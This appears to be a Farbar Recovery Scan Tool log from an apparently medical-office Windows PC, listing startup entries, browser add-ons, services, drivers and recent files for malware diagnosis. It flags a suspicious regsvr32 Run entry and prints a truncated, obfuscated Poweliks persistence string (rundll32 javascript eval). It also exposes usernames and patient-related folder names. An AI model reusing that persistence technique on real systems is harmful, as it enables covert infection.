HKLM\...\Run: [Acrobat Assistant 8.0] => C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [825560 2012-12-18] (Adobe Systems Inc.)
HKLM\...\Run: [XeroxEndeavorBackgroundTask] => rundll32.exe xrWCbgnd.dll,LaunchBgTask 1
HKLM\...\Run: [ZocDoc Alerter] => C:\Program Files\ZocDoc\ZocDoc Alerter\launcher.bat [61 2013-11-06] ()
HKLM\...\Run: [DBAgent] => C:\Program Files\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1519176 2014-02-10] (Seagate Technology LLC)
HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\Run: [Uploader] => C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [126056 2014-02-10] (Seagate Technology LLC)
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\Run: [dmzsfmczo] => regsvr32.exe /s "C:\Users\Server\AppData\Local\{29E5C0CD-57B9-4F77-9AC8-3D2490B42522}\dmzsfmczo.dll" <===== ATTENTION
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\MountPoints2: E - E:\LaunchU3.exe -a
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...\MountPoints2: {a73fbc25-2458-11e3-a7ed-842b2b8dc106} - E:\LaunchU3.exe -a
HKU\S-1-5-21-2237751552-2111478436-699371372-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SmartPrintAPC.lnk
ShortcutTarget: SmartPrintAPC.lnk -> C:\Program Files\Jones Medical\SmartPrint APC\SmartPrintAPC.exe (Jones Medical)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?ocid=msndhp
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.msn.com/USSMB/1
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {070566A4-5FDE-4262-8CC7-07BA1BD08A8D} URL = http://websearch.shopathome.com?user_id=%guid&q={searchTerms}
SearchScopes: HKCU - {1587C1CC-A7C1-4BCE-A8B8-7AA39DD4B7D7} URL = 
BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files\Norton Internet Security\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files\Norton Internet Security\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files\Norton Internet Security\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Toolbar: HKCU - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\TmIEPlg.dll No File
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{0F9DC998-7064-4B0B-BDF8-404185767936}: [NameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default
FF Homepage: about:home
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll (RocketLife, LLP)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF user.js: detected! => C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\user.js
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPcol400.dll (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdeployJava1.dll (Sun Microsystems, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMozCouponPrinter.dll (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\searchplugins\my-web-search.xml
FF SearchPlugin: C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\searchplugins\safesearch.xml
FF Extension: TelevisionFanatic - C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\Extensions\64ffxtbr@TelevisionFanatic.com [2014-02-10]
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Server\AppData\Roaming\Mozilla\Firefox\Profiles\6arooxwm.default\Extensions\LogMeInClient@logmein.com [2011-02-08]
FF HKLM\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - c:\Program Files\Trend Micro\Client Server Security Agent\bho\1009\FirefoxExtension
FF HKLM\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2011-02-01]
FF HKLM\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: SmartPrintButton - C:\Program Files\Hewlett-Packard\SmartPrint\QPExtension [2011-12-29]
FF HKLM\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\coFFPlgn [2014-11-04]
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files\Norton Internet Security\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-02]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 CenLPD; C:\Program Files\Century\TinyTERM\CenLPD.exe [107976 2009-03-18] ()
R2 iTivityRCConnector; C:\Program Files\iTivity\bin\connector_rc.exe [511771 2010-09-09] (Tridia Corporation) [File not signed]
R2 iTivityRCConnectToIASConnector; C:\Program Files\iTivity\bin\connector_rc.exe [511771 2010-09-09] (Tridia Corporation) [File not signed]
R2 iTivityRCController; C:\Program Files\iTivity\bin\processor_rc.exe [552159 2010-09-09] (Tridia Corporation) [File not signed]
S3 LiveUpdate; C:\Program Files\Symantec\LiveUpdate\LuComServer_3_3.EXE [3093944 2011-01-19] (Symantec Corporation)
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 MMWin AppServer; C:\Program Files\Medical Manager Corporation\AppServer\mmservice.exe [110592 2010-11-08] () [File not signed]
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [45568 2014-04-28] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files\Norton Internet Security\Engine\21.6.0.32\NIS.exe [276376 2014-09-21] (Symantec Corporation)
R2 pg-plus-8.3; C:\PostgresPlus\8.3\bin\pg_ctl.exe [65536 2009-12-10] (PostgreSQL Global Development Group) [File not signed]
S3 pg-plus-8.3-replication; C:\PostgresPlus\8.3\bin\slon.exe [2071599 2009-03-13] (PostgreSQL Global Development Group) [File not signed]
S3 pg-plus-8.3-scheduler; C:\PostgresPlus\8.3\bin\pgAgent.exe [704512 2009-03-13] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [55808 2014-04-28] (Hewlett-Packard) [File not signed]
S2 rb_meddata_34083; C:\Med\Medprogs\rbroker.exe [645632 2010-11-16] () [File not signed]
R2 Remote Monitoring; C:\Program Files\rmss\WIN_MONITOR.exe [94337 2012-11-20] () [File not signed]
R2 Seagate Dashboard Services; C:\Program Files\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16000 2014-02-10] (Seagate Technology LLC)
R2 Seagate MobileBackup Service; C:\Program Files\Seagate\Seagate Dashboard 2.0\MobileService.exe [157264 2014-02-10] (Seagate Technology LLC)
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 TridiaFTPServer; C:\Program Files\iTivity\bin\ftpd.exe [536640 2007-07-16] (Tridia Corporation) [File not signed]
R2 tridiavnc; C:\Program Files\iTivity\bin\rfbd.exe [473600 2010-07-28] (Tridia Corporation) [File not signed]
R2 ultia; C:\MED\JDF\service\Wrapper.exe [106496 2010-10-25] () [File not signed]
S2 um_meddata_34083; C:\Python25\lib\site-packages\win32\PythonService.exe [8704 2009-07-05] () [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx86; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20141030.001\BHDrvx86.sys [1138392 2014-10-03] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NIS\1506000.020\ccSetx86.sys [127064 2013-09-25] (Symantec Corporation)
R2 CenNFS; C:\Windows\System32\drivers\CenNFS.sys [138528 2000-06-16] () [File not signed]
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [378672 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [111408 2014-09-09] (Symantec Corporation)
R3 FTDIBUS; C:\Windows\System32\drivers\ftdibus.sys [61704 2011-03-18] (FTDI Ltd.)
R1 IDSVix86; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20141103.001\IDSvix86.sys [476888 2014-08-28] (Symantec Corporation)
R3 mf; C:\Windows\System32\DRIVERS\mf.sys [114176 2009-07-13] (Microsoft Corporation)
R3 NAVENG; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20141103.034\NAVENG.SYS [95704 2014-10-21] (Symantec Corporation)
R3 NAVEX15; C:\Program Files\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20141103.034\NAVEX15.SYS [1636696 2014-10-21] (Symantec Corporation)
R3 NmPar; C:\Windows\System32\DRIVERS\NmPar.sys [81920 2010-01-12] (Windows ® Codename Longhorn DDK provider)
R1 SRTSP; C:\Windows\System32\Drivers\NIS\1506000.020\SRTSP.SYS [664792 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NIS\1506000.020\SRTSPX.SYS [32984 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NIS\1506000.020\SYMDS.SYS [367704 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NIS\1506000.020\SYMEFA.SYS [936152 2014-03-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT.SYS [142936 2013-11-18] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NIS\1506000.020\Ironx86.SYS [209624 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NIS\1506000.020\SYMNETS.SYS [447704 2014-02-17] (Symantec Corporation)
S3 usbbus; C:\Windows\System32\DRIVERS\lgusbbus.sys [13056 2008-11-11] (LG Electronics Inc.)
S3 UsbDiag; C:\Windows\System32\DRIVERS\lgusbdiag.sys [19968 2008-11-11] (LG Electronics Inc.)
S3 UsbGps; C:\Windows\System32\DRIVERS\lgusbgps.sys [19968 2008-11-11] (LG Electronics Inc.)
S3 USBModem; C:\Windows\System32\DRIVERS\lgusbmodem.sys [24832 2008-11-11] (LG Electronics Inc.)
S4 LMIRfsClientNP; No ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-04 13:44 - 2014-11-04 13:46 - 00019761 _____ () C:\Users\Server\Desktop\FRST.txt
2014-11-04 13:39 - 2014-11-04 13:44 - 00000000 ____D () C:\FRST
2014-11-04 13:38 - 2014-11-04 13:37 - 01106432 _____ (Farbar) C:\Users\Server\Desktop\FRST.exe
2014-11-04 13:30 - 2014-11-04 13:28 - 02114560 _____ (Farbar) C:\Users\Server\Desktop\FRST64.exe
2014-10-31 15:28 - 2014-10-31 15:28 - 00000000 ____D () C:\Users\Server\AppData\Local\Seagate_Technology_LLC
2014-10-31 13:23 - 2014-10-31 13:05 - 31679168 _____ (Microsoft Corporation) C:\Users\Server\Desktop\Windows-KB890830-V5.17.exe
2014-10-31 11:53 - 2014-10-31 11:53 - 00000028 _____ () C:\Windows\system32\u
2014-10-31 10:19 - 2014-10-31 10:19 - 00000112 ___RH () C:\Users\Server\Desktop\Stinger.opt
2014-10-31 09:35 - 2014-10-31 10:19 - 00000000 ____D () C:\Program Files\stinger
2014-10-31 09:01 - 2014-10-31 09:01 - 00000000 _____ () C:\Windows\system32\cnsvbuk.dll
2014-10-31 09:00 - 2014-10-31 09:00 - 00040960 _____ () C:\Windows\system32\jvnnbbh.dll
2014-10-31 08:59 - 2014-10-31 08:59 - 00031232 _____ () C:\Windows\system32\jxesd.dll
2014-10-30 12:19 - 2014-10-30 12:19 - 00000000 ____D () C:\Users\Server\AppData\Roaming\Roxio Log Files
2014-10-27 11:27 - 2014-10-27 12:41 - 00007598 _____ () C:\Users\Server\AppData\Local\resmon.resmoncfg
2014-10-16 01:31 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 01:31 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 01:31 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 01:31 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 01:31 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 01:31 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 01:31 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 01:31 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 01:31 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 01:31 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 01:31 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 01:31 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 01:31 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 01:31 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-16 01:31 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-16 01:31 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 01:31 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-16 01:31 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-16 01:31 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 01:31 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 01:31 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 01:31 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 01:31 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-16 01:31 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-16 01:31 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-16 01:31 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-16 01:31 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 01:31 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 01:31 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 01:31 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 01:31 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-16 01:31 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 01:31 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 01:31 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 01:31 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 01:30 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 01:30 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 01:30 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-16 01:30 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 01:30 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 01:30 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 01:30 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 01:30 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-16 01:30 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 01:30 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 01:30 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-07 11:00 - 2014-10-07 11:00 - 00000000 _____ () C:\Windows\HPMProp.INI
2014-10-07 10:58 - 2014-06-17 02:57 - 00055688 _____ (Hewlett-Packard) C:\Windows\system32\hpmnque.dll
2014-10-07 10:58 - 2014-06-17 02:57 - 00055688 _____ (Hewlett-Packard) C:\Windows\system32\hpmnndps.dll
2014-10-07 10:58 - 2014-06-17 02:55 - 00103200 _____ (Hewlett-Packard Company) C:\Windows\system32\hpmlm135.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00196896 _____ (Hewlett-Packard) C:\Windows\system32\hpmml170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00171296 _____ (Hewlett-Packard) C:\Windows\system32\hpmja170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00157984 _____ (Hewlett-Packard) C:\Windows\system32\hpmpm081.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00134944 _____ (Hewlett-Packard) C:\Windows\system32\hpmtp170.dll
2014-10-07 10:58 - 2014-06-17 02:52 - 00062752 _____ (Hewlett-Packard) C:\Windows\system32\hpmpw081.dll
2014-10-07 10:58 - 2014-06-17 02:51 - 00421664 _____ (Hewlett-Packard Corporation) C:\Windows\system32\hpcpn170.dll
2014-10-07 10:58 - 2014-06-17 02:51 - 00119584 _____ (Hewlett-Packard) C:\Windows\system32\hpcjpm.dll
2014-10-07 10:58 - 2011-02-11 14:23 - 00167480 _____ (Hewlett-Packard) C:\Windows\system32\hppccompio.dll
2014-10-07 10:58 - 2009-02-25 16:32 - 00059928 _____ (Hewlett-Packard) C:\Windows\system32\fxcompchannel.dll
2014-10-07 10:50 - 2014-10-07 10:50 - 16652576 _____ () C:\Users\Server\Downloads\upd-pcl5-x32-5.9.0.18326.exe
2014-10-07 10:41 - 2014-10-07 10:52 - 00000000 ____D () C:\HP Universal Print Driver
2014-10-07 10:26 - 2014-10-31 13:04 - 00000000 ____D () C:\Program Files\Mozilla Firefox
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-04 13:45 - 2011-03-28 11:31 - 00000000 ____D () C:\Program Files\rmss
2014-11-04 13:40 - 2009-07-13 23:34 - 00025424 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 13:40 - 2009-07-13 23:34 - 00025424 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 13:32 - 2010-12-17 20:36 - 00801194 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 13:25 - 2013-01-08 09:09 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 12:54 - 2009-07-13 23:55 - 02066563 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 12:34 - 2013-07-30 14:01 - 00000000 ____D () C:\Users\Server\AppData\Local\CrashDumps
2014-11-04 12:23 - 2011-03-28 09:48 - 00011300 ___SH () C:\Windows\system32\.admconf
2014-11-04 12:23 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 12:22 - 2009-07-13 23:39 - 00046096 _____ () C:\Windows\setupact.log
2014-10-31 11:39 - 2012-07-26 13:52 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader X.lnk
2014-10-31 09:59 - 2010-12-17 22:27 - 00249332 _____ () C:\Windows\PFRO.log
2014-10-30 15:23 - 2011-04-26 09:44 - 00000000 ____D () C:\Program Files\HP
2014-10-30 15:22 - 2011-04-26 09:44 - 00000000 ____D () C:\ProgramData\HP
2014-10-30 15:20 - 2011-04-26 09:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2014-10-30 14:11 - 2009-07-13 23:52 - 00000000 ____D () C:\Windows\twain_32
2014-10-30 12:38 - 2011-02-03 18:15 - 00000252 _____ () C:\Windows\wininit.ini
2014-10-30 12:26 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\Roxio Shared
2014-10-30 12:25 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\PX Storage Engine
2014-10-30 12:20 - 2010-12-17 20:34 - 00000000 ____D () C:\Program Files\Common Files\InstallShield
2014-10-30 12:12 - 2011-03-09 11:42 - 00000000 ____D () C:\Users\Dr. Shapiro
2014-10-30 12:10 - 2013-11-14 09:20 - 00000000 ____D () C:\Users\Dr. Shapiro\AppData\Local\ZocDocAlerter
2014-10-29 15:30 - 2013-04-19 11:40 - 00000000 ____D () C:\Users\Server\Documents\DEMOS-Eat & Beat
2014-10-29 13:29 - 2011-02-03 15:28 - 00000000 ____D () C:\Users\Server\Documents\LABELS
2014-10-29 10:02 - 2013-09-04 11:01 - 00000000 ____D () C:\Users\Server\Documents\APS's
2014-10-27 14:54 - 2012-07-26 13:53 - 00000000 ____D () C:\Program Files\Google
2014-10-27 14:50 - 2012-07-26 13:53 - 00000000 ____D () C:\Users\Server\AppData\Local\Google
2014-10-22 15:28 - 2012-08-17 11:32 - 00000000 ____D () C:\Users\Server\AppData\Local\{29E5C0CD-57B9-4F77-9AC8-3D2490B42522}
2014-10-20 14:52 - 2013-09-04 09:47 - 00000000 ____D () C:\Users\Server\Documents\LETTERS FOR PATIENTS
2014-10-16 14:58 - 2013-04-19 14:39 - 00000000 ____D () C:\Users\Server\Documents\DEMOS- Misc
2014-10-16 09:12 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-16 03:15 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-16 02:35 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:26 - 2011-03-29 11:40 - 00000000 ____D () C:\Users\postgres
